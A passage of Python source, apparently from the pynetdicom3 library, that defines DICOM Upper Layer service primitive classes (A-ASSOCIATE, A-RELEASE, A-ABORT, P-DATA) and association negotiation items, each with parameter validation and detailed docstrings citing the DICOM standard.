UF - User option, fixed value\n C - Conditional (on user option)\n M - Mandatory\n MF - Mandatory, fixed value\n (=) - shall have same value as request or response\n\n\n The Requestor sends a request primitive to the local DICOM UL provider =>\n peer UL => indication primitive to Acceptor.\n\n Acceptor sends response primitive to peer UL => local UL => confirmation\n primitive to Requestor\n\n The DICOM UL providers communicate with UL users using service primitives\n The DICOM UL providers communicate with each other using PDUs over TCP/IP\n\n **Service Procedure**\n\n 1. An AE (DICOM UL service user) that desires the establish an association\n issues an A-ASSOCIATE request primitive to the DICOM UL service\n provider. The Requestor shall not issue any primitives except the\n A-ABORT request primitive until it receives an A-ASSOCIATE confirmation\n primitive.\n 2. The DICOM UL service provider issues an A-ASSOCIATE indication primitive\n to the called AE\n 3. The called AE shall accept or reject the association by sending an\n A-ASSOCIATE response primitive with an appropriate Result parameter. The\n DICOM UL service provider shall issue an A-ASSOCIATE confirmation\n primitive having the same Result parameter. The Result Source parameter\n shall be assigned \"UL service-user\"\n 4. If the Acceptor accepts the association, it is established and is\n available for use. DIMSE messages can now be exchanged.\n 5. If the Acceptor rejects the association, it shall not be established and\n is not available for use\n 6. If the DICOM UL service provider is not capable of supporting the\n requested association it shall return an A-ASSOCIATE confirmation\n primitive to the Requestor with an appropriate Result parameter\n (rejected). The Result Source parameter shall be assigned either\n UL service provider (ACSE) or UL service provider (Presentation).\n The indication primitive shall not be issued. The association shall not\n be established.\n 7. Either Requestor or Acceptor may disrupt the Service Procedure by issuing\n an A-ABORT request primitive. The remote AE receives an A-ABORT\n indication primitive. The association shall not be established\n\n Attributes\n ----------\n mode : str\n Fixed value of \"normal\"\n PS3.8 7.1.1.1, [UF, MF(=), -, -]\n application_context_name : pydicom.uid.UID, bytes or str\n The application context name proposed by the requestor. Acceptor returns\n either the same or a different name. Returned name specifies the\n application context used for the Association. See PS3.8 Annex A. The\n application context name shall be a valid UID or UID string and for\n version 3 of the DICOM Standard should be '1.2.840.10008.3.1.1.1'\n PS3.8 7.1.1.2, [M, M(=), M, M(=)]\n calling_ae_title : str or bytes\n Identifies the Requestor of the A-ASSOCIATE service. Must be a valid\n AE\n PS3.8 7.1.1.3, [M, M(=), M, M(=)]\n called_ae_title : str or bytes\n Identifies the intended Acceptor of the A-ASSOCIATE service. Must be a\n valid AE\n PS3.8 7.1.1.4, [M, M(=), M, M(=)]\n responding_ae_title : str or bytes\n Identifies the AE that contains the actual acceptor of the\n A-ASSOCIATE service. Shall always contain the same value as the\n Called AE Title of the A-ASSOCIATE indication\n PS3.8 7.1.1.5, [-, -, MF, MF(=)]\n user_information : list\n Used by Requestor and Acceptor to include AE user information. See\n PS3.8 Annex D and PS3.7 Annex D.3\n PS3.8 7.1.1.6, [M, M(=), M, M(=)]\n result : int\n Provided either by the Acceptor of the A-ASSOCIATE request, the UL\n service provider (ACSE related) or the UL service provider\n (Presentation related). Indicates the result of the A-ASSOCIATE\n service. Allowed values are:\n\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n\n PS3.8 7.1.1.7, [-, -, M, M(=)]\n result_source : int\n Identifies the creating source of the Result and Diagnostic parameters\n Allowed values are:\n\n * 0: UL service-user\n * 1: UL service-provider (ACSE related function)\n * 2: UL service-provider (presentation related function)\n\n PS3.8 7.1.1.8, [-, -, -, M]\n diagnostic : int\n If the `result` parameter is 0 \"rejected (permanent)\" or 1 \"rejected\n (transient)\" then this supplies diagnostic information about the result.\n If `result_source` is 0 \"UL service-user\" then allowed values are:\n\n * 0: no reason given\n * 1: application context name not supported\n * 2: calling AE title not recognised\n * 3: called AE title not recognised\n\n If `result_source` is 1 \"UL service-provider (ACSE related function)\"\n then allowed values are:\n\n * 0: no reason given\n * 1: no common UL version\n\n If `result_source` is 2 \"UL service-provider (presentation related\n function)\" then allowed values are:\n\n * 0: no reason given\n * 1: temporary congestion\n * 2: local limit exceeded\n * 3: called presentation address unknown\n * 4: presentation protocol version not supported\n * 5: no presentation service access point available\n \n PS3.8 7.1.1.9, [-, -, U, C(=)]\n calling_presentation_address : str\n TCP/IP address of the Requestor\n PS3.8 7.1.1.10, [M, M(=), -, -]\n called_presentation_address : str\n TCP/IP address of the intended Acceptor\n PS3.8 7.1.1.11, [M, M(=), -, -]\n responding_presentation_address : str\n Shall always contain the same value as the Called Presentation Address\n PS3.8 7.1.1.12, [-, -, MF, MF(=)]\n presentation_context_definition_list : list\n List of one or more presentation contexts, with each item containing\n a presentation context ID, an Abstract Syntax and a list of one or\n more Transfer Syntax Names. Sent by the Requestor during\n request/indication\n PS3.8 7.1.1.13, [M, M(=), -, -]\n presentation_context_definition_results_list : list\n Used in response/confirmation to indicate acceptance or rejection of\n each presentation context definition.\n List of result values, with a one-to-one correspondence between each\n of the presentation contexts proposed in the Presentation Context\n Definition List parameter.\n The result values may be sent in any order and may be different than\n the order proposed.\n Only one Transfer Syntax per presentation context shall be agreed to\n PS3.8 7.1.1.14, [-, -, M, M(=)]\n presentation_requirements : str\n Fixed value of \"Presentation Kernel\"\n PS3.8 7.1.1.15, [UF, UF(=), UF, UF(=)]\n session_requirements : str\n Fixed value of \"\" (empty string)\n PS3.8 7.1.1.16, [UF, UF(=), UF, UF(=)]\n \"\"\"\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self):\n self.application_context_name = None\n self.calling_ae_title = None\n self.called_ae_title = None\n self.user_information = []\n self.result = None\n self.result_source = None\n self.diagnostic = None\n self.calling_presentation_address = None\n self.called_presentation_address = None\n self.presentation_context_definition_list = []\n self.presentation_context_definition_results_list = []\n\n @property\n def mode(self):\n \"\"\"Return the Mode parameter.\"\"\"\n return \"normal\"\n\n @property\n def application_context_name(self):\n \"\"\"Return the Application Context Name parameter.\"\"\"\n return self._application_context_name\n\n @application_context_name.setter\n def application_context_name(self, value):\n \"\"\"Set the Application Context Name parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Application Context Name\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"application_context_name must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"application_context_name is an invalid UID\")\n raise ValueError(\"application_context_name is an invalid UID\")\n\n self._application_context_name = value\n\n @property\n def calling_ae_title(self):\n \"\"\"Return the Calling AE Title parameter.\"\"\"\n return self._calling_ae_title\n\n @calling_ae_title.setter\n def calling_ae_title(self, value):\n \"\"\"Set the Calling AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Calling AE Title as a string or bytes object. Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._calling_ae_title = validate_ae_title(value)\n else:\n self._calling_ae_title = None\n\n @property\n def called_ae_title(self):\n \"\"\"Return the Called AE Title parameter.\"\"\"\n return self._called_ae_title\n\n @called_ae_title.setter\n def called_ae_title(self, value):\n \"\"\"Set the Called AE Title parameter.\n\n Parameters\n ----------\n value : str or bytes\n The Called AE Title as a string or bytes object. Cannot be an empty\n string and will be truncated to 16 characters long\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n\n if value is not None:\n self._called_ae_title = validate_ae_title(value)\n else:\n self._called_ae_title = None\n\n @property\n def responding_ae_title(self):\n \"\"\"Return the Responding AE Title parameter.\"\"\"\n return self.called_ae_title\n\n @property\n def user_information(self):\n \"\"\"Return the User Information parameter.\"\"\"\n return self._user_information\n\n @user_information.setter\n def user_information(self, value_list):\n \"\"\"Set the A-ASSOCIATE primitive's User Information parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3 user information class objects\n A list of user information objects, must contain at least\n MaximumLengthNegotiation and ImplementationClassUIDNotification\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n valid_usr_info_items = []\n\n if isinstance(value_list, list):\n # Iterate through the items and check they're an acceptable class\n for item in value_list:\n if item.__class__.__name__ in \\\n [\"MaximumLengthNegotiation\",\n \"ImplementationClassUIDNotification\",\n \"ImplementationVersionNameNotification\",\n \"AsynchronousOperationsWindowNegotiation\",\n \"SCP_SCU_RoleSelectionNegotiation\",\n \"SOPClassExtendedNegotiation\",\n \"SOPClassCommonExtendedNegotiation\",\n \"UserIdentityNegotiation\"]:\n valid_usr_info_items.append(item)\n else:\n LOGGER.info(\"Attempted to set \"\n \"A_ASSOCIATE.user_information to a list \"\n \"which includes an unsupported item\")\n else:\n LOGGER.error(\"A_ASSOCIATE.user_information must be a list\")\n raise TypeError(\"A_ASSOCIATE.user_information must be a list\")\n\n self._user_information = valid_usr_info_items\n\n @property\n def result(self):\n \"\"\"Return te Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result parameter.\n\n Parameters\n ----------\n value : str\n One of the following:\n * 0: accepted\n * 1: rejected (permanent)\n * 2: rejected (transient)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [0, 1, 2]:\n LOGGER.error(\"A_ASSOCIATE.result set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result value\")\n\n self._result = value\n\n @property\n def result_source(self):\n \"\"\"Return the Result Source parameter.\"\"\"\n return self._result_source\n\n @result_source.setter\n def result_source(self, value):\n \"\"\"Set the A-ASSOCIATE Service primitive's Result Source parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1: UL service-user\n * 2: UL service-provider (ACSE related function)\n * 3: UL service-provider (presentation related function)\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3]:\n LOGGER.error(\"A_ASSOCIATE.result_source set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.result_source value\")\n\n self._result_source = value\n\n @property\n def diagnostic(self):\n \"\"\"Return the Diagnostic parameter.\"\"\"\n return self._diagnostic\n\n @diagnostic.setter\n def diagnostic(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Diagnostic parameter\n\n Parameters\n ----------\n value : int\n If `result_source` is \"UL service-user\" then allowed values are:\n * 1: no reason given\n * 2: application context name not supported\n * 3: calling AE title not recognised\n * 7: called AE title not recognised\n If `result_source` is \"UL service-provider (ACSE related function)\"\n then allowed values are:\n * 1: no reason given\n * 2: protocol version not supported\"\n If `result_source` is \"UL service-provider (Presentation related\n function)\" then allowed values are:\n * 1: temporary congestion\n * 2: local limit exceeded\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is None:\n pass\n elif value not in [1, 2, 3, 7]:\n LOGGER.error(\"A_ASSOCIATE.diagnostic set to an unknown value\")\n raise ValueError(\"Unknown A_ASSOCIATE.diagnostic value\")\n\n self._diagnostic = value\n\n @property\n def calling_presentation_address(self):\n \"\"\"Return the Calling Presentation Address parameter.\"\"\"\n return self._calling_presentation_address\n\n @calling_presentation_address.setter\n def calling_presentation_address(self, value):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Calling Presentation\n Address parameter\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._calling_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.calling_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.calling_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def called_presentation_address(self):\n \"\"\"Return the Called Presentation Address parameter.\"\"\"\n return self._called_presentation_address\n\n @called_presentation_address.setter\n def called_presentation_address(self, value):\n \"\"\"Set the Called Presentation Address parameter.\n\n Parameters\n ----------\n value : (str, int) tuple\n A tuple containing a valid TCP/IP address string and the port number\n as an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, tuple):\n if len(value) == 2 and isinstance(value[0], str) \\\n and isinstance(value[1], int):\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address \"\n \"must be (str, int) tuple\")\n elif value is None:\n self._called_presentation_address = value\n else:\n LOGGER.error(\"A_ASSOCIATE.called_presentation_address must be \"\n \"(str, int) tuple\")\n raise TypeError(\"A_ASSOCIATE.called_presentation_address must \"\n \"be (str, int) tuple\")\n\n @property\n def responding_presentation_address(self):\n \"\"\"Get the Responding Presentation Address parameter.\"\"\"\n return self.called_presentation_address\n\n @property\n def presentation_context_definition_list(self):\n \"\"\"Get the Presentation Context Definition List.\"\"\"\n return self._presentation_context_definition_list\n\n @presentation_context_definition_list.setter\n def presentation_context_definition_list(self, value_list):\n \"\"\"\n Set the A-ASSOCIATE Service primitive's Presentation Context Definition\n List parameter\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The Presentation Contexts proposed by the Association Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set \"\n \"A_ASSOCIATE.presentation_context_definition_list to \"\n \"a list which includes an invalid items\")\n\n self._presentation_context_definition_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_list \"\n \"must be a list\")\n\n @property\n def presentation_context_definition_results_list(self):\n \"\"\"Get the Presentation Context Definition Results List.\"\"\"\n return self._presentation_context_definition_results_list\n\n @presentation_context_definition_results_list.setter\n def presentation_context_definition_results_list(self, value_list):\n \"\"\"Set the Presentation Context Definition Results List parameter.\n\n Parameters\n ----------\n value_list : list of pynetdicom3.utils.PresentationContext\n The results of the Presentation Contexts proposal by the Association\n Requestor\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n valid_items = []\n for item in value_list:\n if isinstance(item, PresentationContext):\n valid_items.append(item)\n else:\n LOGGER.warning(\"Attempted to set A_ASSOCIATE.presentation\"\n \"_context_definition_results_list to a \"\n \"list which includes one or more invalid \"\n \"items.\")\n\n self._presentation_context_definition_results_list = valid_items\n\n else:\n LOGGER.error(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n raise TypeError(\"A_ASSOCIATE.presentation_context_definition_\"\n \"results_list must be a list\")\n\n @property\n def presentation_requirements(self):\n \"\"\"Get the Presentation Kernel.\"\"\"\n return \"Presentation Kernel\"\n\n @property\n def session_requirements(self):\n \"\"\"Get the Session Requirements.\"\"\"\n return \"\"\n\n # Shortcut attributes for User Information items\n # Mandatory UI Items\n @property\n def maximum_length_received(self):\n \"\"\"Get the Maximum Length Received.\"\"\"\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n return item.maximum_length_received\n\n return None\n\n @maximum_length_received.setter\n def maximum_length_received(self, value):\n \"\"\"Set the Maximum Length Received.\n\n If the A_ASSOCIATE.user_information list contains a\n MaximumLengthNegotiated item then set its maximum_length_received value.\n If not then add a MaximumLengthNegotiated item and set its\n maximum_length_received value.\n\n Parameters\n ----------\n value : int\n The maximum length of each P-DATA in bytes\n \"\"\"\n # Type and value checking for the maximum_length_received parameter is\n # done by the MaximumLengthNegotiated class\n\n # Check for a MaximumLengthNegotiation item\n found_item = False\n\n for item in self.user_information:\n if isinstance(item, MaximumLengthNegotiation):\n found_item = True\n item.maximum_length_received = value\n\n # No MaximumLengthNegotiated item found\n if not found_item:\n max_length = MaximumLengthNegotiation()\n max_length.maximum_length_received = value\n self.user_information.append(max_length)\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n if item.implementation_class_uid is None:\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not \"\n \"been set\")\n\n return item.implementation_class_uid\n\n LOGGER.error(\"Implementation Class UID has not been set\")\n raise ValueError(\"Implementation Class UID has not been set\")\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Set the Implementation Class UID.\n\n If the A_ASSOCIATE.user_information list contains an\n ImplementationClassUIDNotification item then set its\n implementation_class_uid value. If not then add a\n ImplementationClassUIDNotification item and set its\n implementation_class_uid value.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # Type and value checking for the implementation_class_uid parameter is\n # done by the ImplementationClassUIDNotification class\n\n # Check for a ImplementationClassUIDNegotiation item\n found_item = False\n for item in self.user_information:\n if isinstance(item, ImplementationClassUIDNotification):\n found_item = True\n item.implementation_class_uid = value\n\n # No ImplementationClassUIDNegotiation item found\n if not found_item:\n imp_uid = ImplementationClassUIDNotification()\n imp_uid.implementation_class_uid = value\n self.user_information.append(imp_uid)\n\n\nclass A_RELEASE(object):\n \"\"\"\n A-RELEASE Parameters\n\n The release of an association between two AEs shall be performed through\n ACSE A-RELEASE request, indication, response and confirmation primitives.\n The initiator of the service is called a Requestor and the service-user that\n receives the A-RELEASE indication is called the acceptor.\n\n Service Procedure\n\n 1. The user (Requestor) that desires to end the association issues an\n A-RELEASE request primitive. The Requestor shall not issue any other\n primitives other than A-ABORT until it receives an A-RELEASE confirmation\n primitive.\n 2. The DUL provider issues an A-RELEASE indication to the Acceptor. The\n Acceptor shall not issue any other primitives other than A-RELEASE response,\n A-ABORT request or P-DATA request.\n 3. To complete the release, the Acceptor replies using an A-RELEASE response\n primitive, with \"affirmative\" as the result parameter.\n 4. After the Acceptor issues the A-RELEASE response it shall not issue any\n more primitives.\n 5. The Requestor shall issue an A-RELEASE confirmation primitive always\n with an \"affirmative\" value for the Result parameter.\n 6. A user may disrupt the release by issuing an A-ABORT request.\n 7. A collision may occur when both users issue A-RELEASE requests\n simultaneously. In this situation both users receive an unexpect A-RELEASE\n indication primitive (instead of an A-RELEASE acceptance):\n\n a. The association requestor issues an A-RELEASE response primitive\n b. The association acceptor waits for an A-RELEASE confirmation\n primitive from its peer. When it receives one it issues an A-RELEASE\n response primitive\n c. The association requestor receives an A-RELEASE confirmation\n primitive.\n\n When both ACSE users have received an A-RELEASE confirmation primitive the\n association shall be released.\n\n Parameter Request Indication Response Confirmation\n reason UF UF(=) UF UF(=)\n user info NU NU(=) NU NU(=)\n result MF MF(=)\n\n UF - User option, fixed\n NU - Not used\n MF - Mandatory, fixed\n (=) - shall have same value as request or response\n\n See PS3.8 Section 7.2\n\n Attributes\n ----------\n reason : str\n Fixed value of \"normal\". Identifies the general level of urgency of the\n request\n PS3.8 7.2.1.1, [UF, UF(=), UF, UF(=)]\n result : str or None\n Must be None for request and indication, \"affirmative\" for response\n and confirmation\n PS3.8 7.2.1.2, [-, -, MF, MF(=)]\n \"\"\"\n\n def __init__(self):\n self.result = None\n\n @property\n def reason(self):\n \"\"\"Return the Reason parameter.\"\"\"\n return \"normal\"\n\n @property\n def result(self):\n \"\"\"Return the Result parameter.\"\"\"\n return self._result\n\n @result.setter\n def result(self, value):\n \"\"\"Set the Result parameter.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value is not None and value != \"affirmative\":\n LOGGER.error(\"A_RELEASE.result must be None or 'affirmative'\")\n raise ValueError(\"A_RELEASE.result must be None or 'affirmative'\")\n\n self._result = value\n\n\nclass A_ABORT(object):\n \"\"\"A-ABORT Parameters\n\n See PS3.8 Section 7.3.1\n\n Attributes\n ----------\n abort_source : int\n Indicates the initiating source of the abort. Allowed values are:\n * 0: UL service-user\n * 2: UL service-provider\n\n PS3.8 7.3.1.1, [-, M, X, X]\n \"\"\"\n\n def __init__(self):\n self.abort_source = None\n\n @property\n def abort_source(self):\n \"\"\"Return the Abort Source.\"\"\"\n if self._abort_source is None:\n LOGGER.error(\"A_ABORT.abort_source parameter not set\")\n raise ValueError(\"A_ABORT.abort_source value not set\")\n\n return self._abort_source\n\n @abort_source.setter\n def abort_source(self, value):\n \"\"\"Set the Abort Source.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 2]:\n self._abort_source = value\n elif value is None:\n self._abort_source = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.abort_source to an \"\n \"invalid value\")\n\n\nclass A_P_ABORT(object):\n \"\"\"A-P-ABORT Parameters.\n\n See PS3.8 Section 7.4.1\n\n Attributes\n ----------\n provider_reason : int\n Indicates the reason for the abort. Allowed values are:\n * 0: reason not specified\n * 1: unrecognised PDU\n * 2: unexpected PDU\n * 4: unrecognised PDU parameter\n * 5: unexpected PDU parameter\n * 6: invalid PDU parameter value\n\n PS3.8 7.3.1.1, [P, X, X, X]\n \"\"\"\n\n def __init__(self):\n self.provider_reason = None\n\n @property\n def provider_reason(self):\n \"\"\"Return the Provider Reason.\"\"\"\n if self._provider_reason is None:\n LOGGER.error(\"A_ABORT.provider_reason parameter not set\")\n raise ValueError(\"A_ABORT.provider_reason value not set\")\n\n return self._provider_reason\n\n @provider_reason.setter\n def provider_reason(self, value):\n \"\"\"Set the Provider Reason.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if value in [0, 1, 2, 4, 5, 6]:\n self._provider_reason = value\n elif value is None:\n self._provider_reason = None\n else:\n LOGGER.error(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n raise ValueError(\"Attempted to set A_ABORT.provider_reason to an \"\n \"invalid value\")\n\n\nclass P_DATA(object):\n \"\"\"P-DATA Parameters.\n\n See PS3.8 Section 7.6.1\n\n Attributes\n ----------\n presentation_data_value_list : list of [int, bytes]\n Contains one or more Presentation Data Values (PDV), each consisting of\n a Presentation Context ID and User Data values. The User Data values are\n taken from the Abstract Syntax and encoded in the Transfer Syntax\n identified by the Presentation Context ID. Each item in the list is\n [Context ID, PDV Data]\n PS3.8 7.6.1, [M, M(=), x, x]\n \"\"\"\n\n def __init__(self):\n self.presentation_data_value_list = []\n\n @property\n def presentation_data_value_list(self):\n \"\"\"Return the Presentation Data Value List.\"\"\"\n return self._presentation_data_value_list\n\n @presentation_data_value_list.setter\n def presentation_data_value_list(self, value_list):\n \"\"\"Set the Presentation Data Value List.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value_list, list):\n for pdv in value_list:\n if isinstance(pdv, list):\n if isinstance(pdv[0], int) and isinstance(pdv[1], bytes):\n pass\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [ID, PDV]\")\n else:\n raise TypeError(\"P_DATA.presentation_data_value_list \"\n \"should be a list of [int, bytes]\")\n\n self._presentation_data_value_list = value_list\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'P-DATA\\n'\n for pdv in self.presentation_data_value_list:\n s += ' Context ID: {0!s}\\n'.format(pdv[0])\n s += ' Value Length: {0!s} bytes\\n'.format(len(pdv[1]))\n header_byte = pdv[1][0]\n\n # Python 2 compatibility\n if isinstance(header_byte, str):\n header_byte = ord(header_byte)\n\n s += \" Message Control Header Byte: {:08b}\\n\".format(header_byte)\n\n # xxxxxx01 and xxxxxx011\n if header_byte & 1:\n # xxxxxx11\n if header_byte & 2:\n s += ' Command information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx01\n else:\n s += ' Command information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n # xxxxxx00, xxxxxxx10\n else:\n # xxxxxx10\n if header_byte & 2 != 0:\n s += ' Dataset information, last fragment of the ' \\\n 'DIMSE message\\n'\n # xxxxxx00\n else:\n s += ' Dataset information, not the last fragment of ' \\\n 'the DIMSE message\\n'\n\n # Remaining data\n #s += pretty_bytes(pdv[1][1:], ' ', max_size=512)\n\n return s\n\n\n# User Information Negotiation primitives\nclass MaximumLengthNegotiation(ServiceParameter):\n \"\"\"Define the Maximum Length Negotiation primitive.\n\n The maximum length notification allows communicating AEs to limit the size\n of the data for each P-DATA indication. This notification is required for\n all DICOM v3.0 conforming implementations.\n\n This User Information item is required during Association negotiation and\n there must only be a single MaximumLengthNegotiation item\n\n PS3.7 Annex D.3.3.1 and PS3.8 Annex D.1\n\n Attributes\n ----------\n maximum_length_received : int\n The maximum length received value for the Maximum Length sub-item in\n bytes. A value of 0 indicates unlimited length (31682 bytes default).\n \"\"\"\n\n def __init__(self):\n self.maximum_length_received = 16382\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.MaximumLengthSubItem\n \"\"\"\n item = MaximumLengthSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_length_received(self):\n \"\"\"Return the Maximum Length Received.\"\"\"\n return self._maximum_length\n\n @maximum_length_received.setter\n def maximum_length_received(self, val):\n \"\"\"User defined Maximum Length to be used during an Association.\n\n Parameters\n ----------\n val : int\n The maximum length of each P-DATA in bytes, must be equal to or\n greater than 0. A value of 0 indicates an unlimited maximum length.\n\n Raises\n ------\n ValueError\n If `maximum_length_received` is negative\n TypeError\n If `maximum_length_received` is not an int\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(val, int):\n if val < 0:\n LOGGER.error('Maximum Length Received must be greater than 0')\n raise ValueError(\"Maximum Length Received must be greater \"\n \"than 0\")\n else:\n self._maximum_length = val\n else:\n LOGGER.error(\"Maximum Length Received must be numerical\")\n raise TypeError(\"Maximum Length Received must be numerical\")\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Maximum Length Negotiation\\n\"\n s += \" Maximum length received: {0:d} bytes\\n\".format(\n self.maximum_length_received)\n return s\n\n\nclass ImplementationClassUIDNotification(ServiceParameter):\n \"\"\"The Implementation Class UID Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Class UID is required during Association negotiation and\n there must only be a single ImplementationClassUID item\n\n PS3.7 Annex D.3.3.2\n\n Example\n -------\n impl_class_uid = ImplementationClassUID()\n impl_class_uid.implementation_class_uid = '1.1.2.2.3.3.4'\n\n usr_data_neg = []\n usr_data_neg.append(impl_class_uid)\n\n Attributes\n ----------\n implementation_class_uid : pydicom.uid.UID, bytes or str\n The UID to use\n \"\"\"\n\n def __init__(self):\n self.implementation_class_uid = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationClassUIDSubItem\n\n Raises\n ------\n ValueError\n If no UID is set\n \"\"\"\n if self.implementation_class_uid is None:\n LOGGER.error(\"The Implementation Class UID must be set prior to \"\n \"requesting Association\")\n raise ValueError(\"The Implementation Class UID must be set \"\n \"prior to requesting Association\")\n\n item = ImplementationClassUIDSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def implementation_class_uid(self):\n \"\"\"Return the Implementation Class UID.\"\"\"\n return self._implementation_class_uid\n\n @implementation_class_uid.setter\n def implementation_class_uid(self, value):\n \"\"\"Sets the Implementation Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The value for the Implementation Class UID\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n raise TypeError(\"Implementation Class UID must be a \"\n \"pydicom.uid.UID, str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._implementation_class_uid = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Class UID\\n\"\n s += \" Implementation class UID: {0!s}\\n\" \\\n .format(self.implementation_class_uid)\n return s\n\n\nclass ImplementationVersionNameNotification(ServiceParameter):\n \"\"\"The Implementation Version Name Notification primitive.\n\n The implementation identification notification allows implementations of\n communicating AEs to identify each other at Association establishment time.\n It is intended to provider respective and non-ambiguous identification in\n the event of communication problems encountered between two nodes. This\n negotiation is required.\n\n Implementation identification relies on two pieces of information:\n - Implementation Class UID (required)\n - Implementation Version Name (optional)\n\n The Implementation Version Name is optional and there may only be a single\n ImplementationVersionName item\n\n PS3.7 Annex D.3.3.2\n\n Attributes\n ----------\n implementation_version_name : str or bytes\n The version name to use, maximum of 16 characters\n \"\"\"\n\n def __init__(self):\n self.implementation_version_name = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.ImplementationVersionNameSubItem\n\n Raises\n ------\n ValueError\n If no name is set\n \"\"\"\n if self.implementation_version_name is None:\n raise ValueError(\"Implementation Version Name must be set prior \"\n \"to Association\")\n\n item = ImplementationVersionNameSubItem()\n 